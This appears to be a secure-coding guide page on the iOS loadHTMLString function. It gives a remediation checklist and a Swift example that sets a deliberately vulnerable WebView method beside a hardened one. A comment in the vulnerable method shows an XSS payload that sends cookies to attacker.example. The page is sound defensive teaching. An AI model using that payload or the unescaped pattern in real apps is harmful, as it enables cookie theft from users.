Insecure Use of Dangerous Function
Why is this important?
iOS, like any other platform, exposes functions that are dangerous when used carelessly. If untrusted input reaches one of them, the impact on your app can be catastrophic: for loadHTMLString, an attacker who controls part of the HTML can run JavaScript inside your WebView.
JavaScript Injection
Option A: Use operating system APIs securely
- Go through the issues that GuardRails identified in the PR.
- Locate the dangerous function, loadHTMLString
- Ensure that untrusted input cannot reach the HTML string passed to loadHTMLString without being HTML-escaped, and that users cannot influence the baseURL (which sets the origin of the loaded content), the file name or path used to load the content, or the contents of the loaded file.
- Test it and ensure the functionality works as expected
- Ship it 🚢 and relax 🌴
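The following is an added example written for this page, not code from GuardRails or from any real app. It shows the pattern the checklist above is guarding against: a user-controlled value interpolated straight into the HTML passed to loadHTMLString, beside a hardened version that escapes the value, gives the document no file:// origin, and turns off JavaScript where the page does not need it. The class name, the displayName parameter and the htmlEscape helper are assumptions made for the example.

```swift
import UIKit
import WebKit

// Added example (not from the GuardRails docs or any real project).
// `displayName` stands in for any attacker-influenced input: a server
// response, a deep-link parameter, a QR code, etc.

/// HTML-escapes a string so the WebView renders it as text instead of
/// parsing it as markup. Hypothetical helper written for this example.
func htmlEscape(_ s: String) -> String {
    var out = ""
    out.reserveCapacity(s.utf8.count)
    for ch in s {
        switch ch {
        case "&":  out += "&amp;"
        case "<":  out += "&lt;"
        case ">":  out += "&gt;"
        case "\"": out += "&quot;"
        case "'":  out += "&#39;"
        default:   out.append(ch)
        }
    }
    return out
}

final class ProfileViewController: UIViewController {
    private let webView: WKWebView

    init() {
        let config = WKWebViewConfiguration()
        // The greeting page needs no script at all, so disable content
        // JavaScript entirely (iOS 14+). Injected markup then cannot execute.
        config.defaultWebpagePreferences.allowsContentJavaScript = false
        webView = WKWebView(frame: .zero, configuration: config)
        super.init(nibName: nil, bundle: nil)
    }

    required init?(coder: NSCoder) { fatalError("not used") }

    override func viewDidLoad() {
        super.viewDidLoad()
        webView.frame = view.bounds
        webView.autoresizingMask = [.flexibleWidth, .flexibleHeight]
        view.addSubview(webView)
    }

    // VULNERABLE: the raw value lands inside the document. A display name such as
    //   <img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">
    // becomes script, and because baseURL points at the app bundle the script
    // runs with a file:// origin and can reference bundled resources.
    func renderUnsafe(displayName: String) {
        let html = "<h1>Hello, \(displayName)</h1>"
        webView.loadHTMLString(html, baseURL: Bundle.main.bundleURL)
    }

    // HARDENED: the value is escaped before it is placed in the document, and
    // baseURL is nil so the content gets an opaque origin rather than file://.
    // Combined with allowsContentJavaScript = false above, even a missed
    // escaping bug cannot turn into script execution.
    func renderSafe(displayName: String) {
        let html = "<h1>Hello, \(htmlEscape(displayName))</h1>"
        webView.loadHTMLString(html, baseURL: nil)
    }
}
```

When the page genuinely needs JavaScript, keep the escaping and the nil (or https://) baseURL, and treat every value that ends up inside a script block or attribute as needing its own context-specific encoding; HTML escaping alone is not enough inside a `<script>` tag.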
More information:
- Testing WebView Protocol Handlers
- OWASP Top 10 - A03 Injection
- Holistic Info-Sec for Web Developers: Injection risks, countermeasures